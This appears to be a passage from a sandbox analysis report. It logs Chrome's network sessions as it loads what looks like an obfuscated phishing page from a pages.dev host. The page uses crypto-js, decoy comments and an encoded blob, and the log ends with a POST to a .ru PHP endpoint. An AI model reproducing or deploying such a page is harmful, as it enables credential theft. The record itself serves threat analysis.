                                                                2024-08-27 18:11:32 UTC474INData Raw: 7a 4f 44 56 6a 5a 57 49 32 4d 47 51 79 4e 32 46 6d 59 6a 41 35 4d 6a 4d 78 59 7a 52 6b 5a 44 45 34 4e 7a 6b 7a 4e 6a 46 6d 59 7a 51 34 5a 44 56 69 4f 54 64 6b 4d 6a 63 30 4d 54 4d 30 4d 6d 4a 6a 4e 54 42 6b 4d 44 41 33 4f 54 64 6d 4e 7a 4e 68 4f 54 42 6d 4d 6a 46 6c 4d 57 49 32 5a 54 51 79 4e 57 4d 30 4e 6a 67 77 4e 57 4d 32 4d 6a 45 79 4f 44 45 30 4e 32 4e 6c 4f 47 56 6d 59 57 55 31 4f 54 68 6d 4e 32 55 32 4d 44 49 31 5a 54 68 6d 49 69 77 69 5a 43 49 36 49 6a 5a 68 4e 6a 45 32 59 7a 5a 6d 4e 7a 41 33 4f 53 4a 39 60 29 29 2c 20 7b 20 3c 21 2d 2d 20 44 72 69 76 69 6e 67 20 69 73 20 61 20 63 6f 6e 76 65 72 73 61 74 69 6f 6e 20 62 65 74 77 65 65 6e 20 79 6f 75 20 61 6e 64 20 74 68 65 20 72 6f 61 64 2e 20 2d 2d 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d
                                                                Data Ascii: zODVjZWI2MGQyN2FmYjA5MjMxYzRkZDE4NzkzNjFmYzQ4ZDViOTdkMjc0MTM0MmJjNTBkMDA3OTdmNzNhOTBmMjFlMWI2ZTQyNWM0NjgwNWM2MjEyODE0N2NlOGVmYWU1OThmN2U2MDI1ZThmIiwiZCI6IjZhNjE2YzZmNzA3OSJ9`)), { ... Driving is a conversation between you and the road. --> m
                                                                2024-08-27 18:11:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                20192.168.2.549751151.101.2.1374436276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:11:31 UTC668OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                Host: code.jquery.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: */*
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: script
                                                                Referer: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:11:31 UTC611INHTTP/1.1 200 OK
                                                                Connection: close
                                                                Content-Length: 89501
                                                                Server: nginx
                                                                Content-Type: application/javascript; charset=utf-8
                                                                Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                ETag: "28feccc0-15d9d"
                                                                Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                Access-Control-Allow-Origin: *
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                Via: 1.1 varnish, 1.1 varnish
                                                                Accept-Ranges: bytes
                                                                Age: 2797848
                                                                Date: Tue, 27 Aug 2024 18:11:31 GMT
                                                                X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890077-NYC
                                                                X-Cache: HIT, HIT
                                                                X-Cache-Hits: 55, 0
                                                                X-Timer: S1724782292.954482,VS0,VE1
                                                                Vary: Accept-Encoding
                                                                2024-08-27 18:11:31 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                2024-08-27 18:11:31 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                2024-08-27 18:11:31 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                2024-08-27 18:11:31 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                2024-08-27 18:11:31 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                2024-08-27 18:11:32 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                2024-08-27 18:11:32 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                2024-08-27 18:11:32 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                2024-08-27 18:11:32 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                2024-08-27 18:11:32 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                21192.168.2.549752172.66.44.1454436276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:11:32 UTC387OUTGET /, HTTP/1.1
                                                                Host: ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:11:33 UTC784INHTTP/1.1 200 OK
                                                                Date: Tue, 27 Aug 2024 18:11:33 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                Cache-Control: public, max-age=0, must-revalidate
                                                                referrer-policy: strict-origin-when-cross-origin
                                                                x-content-type-options: nosniff
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TyYWXcUnfnO7fxEUp3MyCl3iTeQT0V4GlhJWx4rcguXV74Z9dgP4qjFokXdWvNiA2Ekghhd2J%2Bw%2F9TczBpiFB1GF8z2kETWy2PTtSFiTgSKyiZLyBijTt77gPRl3HB1TzXZ6t2YxqB1Q%2BE1B8buoExHpUmkMPQOgiX9ItpEoJOVDK3ThQ%2FRDKfWeej%2FhZbq0BA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8b9e0654be1932e4-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-08-27 18:11:33 UTC1369INData Raw: 31 37 33 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 3c 68 65 61 64 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e e2 81 a4 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e
                                                                Data Ascii: 1736<html> <head> <title></title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow"> <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.
                                                                2024-08-27 18:11:33 UTC1369INData Raw: 74 69 6f 6e 3a 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2c 20 30 2e 35 2c 20 30 2c 20 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 35 31 70 78 29 20 73 63 61 6c 65 59 28 31 29 3b 7d 40 6b 65 79 66 72 61 6d 65 73 20 63 61 6c 2d 62 6f 75 6e 63 65 20 7b 30 25 2c 20 31 30 30 25 2c 20 31 36 2e 35 25 2c 20 37 36 2e 31 25 20 7b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 31 35 31 70 78 29 20 73 63 61 6c 65 59 28 31 29 3b 7d 32 38 25 20 7b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 33 39 70 78 29 20 73 63 61 6c 65 59 28 31 29 3b 7d 33 31 25 20 7b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 35 31 70 78 29 20 73 63 61 6c 65 59 28 31 2e 30 35 29 3b 7d 33 33 25 20 7b
                                                                Data Ascii: tion: cubic-bezier(0, 0.5, 0, 1);transform: translateY(51px) scaleY(1);}@keyframes cal-bounce {0%, 100%, 16.5%, 76.1% {transform: translateY(151px) scaleY(1);}28% {transform: translateY(39px) scaleY(1);}31% {transform: translateY(51px) scaleY(1.05);}33% {
                                                                2024-08-27 18:11:33 UTC1369INData Raw: 72 61 6d 65 73 20 63 6c 6f 73 65 64 2d 66 6c 61 70 2d 73 77 69 6e 67 20 7b 30 25 2c 20 31 30 30 25 2c 20 37 37 25 2c 20 38 2e 35 25 20 7b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 2d 37 31 70 78 29 20 72 6f 74 61 74 65 33 64 28 31 2c 20 30 2c 20 30 2c 20 30 29 3b 7d 31 34 2e 35 25 2c 20 37 36 25 20 7b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 2d 37 31 70 78 29 20 72 6f 74 61 74 65 33 64 28 31 2c 20 30 2c 20 30 2c 20 39 30 64 65 67 29 3b 7d 7d 23 62 61 63 6b 64 72 6f 70 20 7b 77 69 64 74 68 3a 20 31 33 30 70 78 3b 68 65 69 67 68 74 3a 20 31 30 37 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 7d 2e 6c 61 63 6f 6e 69 63 20 7b 77 69 64 74 68 3a 20 39 36 70 78 3b 68 65 69 67 68 74 3a 20 39 36 70 78
                                                                Data Ascii: rames closed-flap-swing {0%, 100%, 77%, 8.5% {transform: translateY(-71px) rotate3d(1, 0, 0, 0);}14.5%, 76% {transform: translateY(-71px) rotate3d(1, 0, 0, 90deg);}}#backdrop {width: 130px;height: 107px;overflow: hidden;}.laconic {width: 96px;height: 96px
                                                                2024-08-27 18:11:33 UTC1369INData Raw: 72 65 22 3e 3c 64 69 76 20 69 64 3d 22 62 61 63 6b 64 72 6f 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 61 63 6f 6e 69 63 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0d 0a 09 3c 21 2d 2d 20 3c 73 70 61 6e 3e 4c 69 66 65 e2 80 99 73 20 6a 6f 75 72 6e 65 79 20 69 73 20 62 65 73 74 20 65 78 70 65 72 69 65 6e 63 65 64 20 62 65 68 69 6e 64 20 74 68 65 20 77 68 65 65 6c 2e 3c 2f 73 70 61 6e 3e 20 2d 2d 3e 0d 0a 20 3c 2f 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 6c 61 62 6f 72 65 64 28 79 61 63 68 74 69 6e 67 29 20 7b 20 3c 21 2d 2d 20 44 72 69 76 69 6e 67 20 69 73 20 74 68 65 20 72 68 79 74 68 6d 20 6f 66 20 6c 69 66 65 20 69 6e 20 6d 6f 74 69 6f 6e 2e 20 2d
                                                                Data Ascii: re"><div id="backdrop"><div class="laconic"></div></div></div></div>... <span>Lifes journey is best experienced behind the wheel.</span> --> </body><script> async function labored(yachting) { ... Driving is the rhythm of life in motion. -
                                                                2024-08-27 18:11:33 UTC474INData Raw: 7a 4f 44 56 6a 5a 57 49 32 4d 47 51 79 4e 32 46 6d 59 6a 41 35 4d 6a 4d 78 59 7a 52 6b 5a 44 45 34 4e 7a 6b 7a 4e 6a 46 6d 59 7a 51 34 5a 44 56 69 4f 54 64 6b 4d 6a 63 30 4d 54 4d 30 4d 6d 4a 6a 4e 54 42 6b 4d 44 41 33 4f 54 64 6d 4e 7a 4e 68 4f 54 42 6d 4d 6a 46 6c 4d 57 49 32 5a 54 51 79 4e 57 4d 30 4e 6a 67 77 4e 57 4d 32 4d 6a 45 79 4f 44 45 30 4e 32 4e 6c 4f 47 56 6d 59 57 55 31 4f 54 68 6d 4e 32 55 32 4d 44 49 31 5a 54 68 6d 49 69 77 69 5a 43 49 36 49 6a 5a 68 4e 6a 45 32 59 7a 5a 6d 4e 7a 41 33 4f 53 4a 39 60 29 29 2c 20 7b 20 3c 21 2d 2d 20 44 72 69 76 69 6e 67 20 69 73 20 61 20 63 6f 6e 76 65 72 73 61 74 69 6f 6e 20 62 65 74 77 65 65 6e 20 79 6f 75 20 61 6e 64 20 74 68 65 20 72 6f 61 64 2e 20 2d 2d 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d
                                                                Data Ascii: zODVjZWI2MGQyN2FmYjA5MjMxYzRkZDE4NzkzNjFmYzQ4ZDViOTdkMjc0MTM0MmJjNTBkMDA3OTdmNzNhOTBmMjFlMWI2ZTQyNWM0NjgwNWM2MjEyODE0N2NlOGVmYWU1OThmN2U2MDI1ZThmIiwiZCI6IjZhNjE2YzZmNzA3OSJ9`)), { ... Driving is a conversation between you and the road. --> m
                                                                2024-08-27 18:11:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                22192.168.2.549753104.21.51.1384436276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:11:32 UTC775OUTPOST ///7627.php HTTP/1.1
                                                                Host: glansaolksnu.ru
                                                                Connection: keep-alive
                                                                Content-Length: 47
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                Accept: application/json, text/javascript, */*; q=0.01
                                                                Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                sec-ch-ua-mobile: ?0
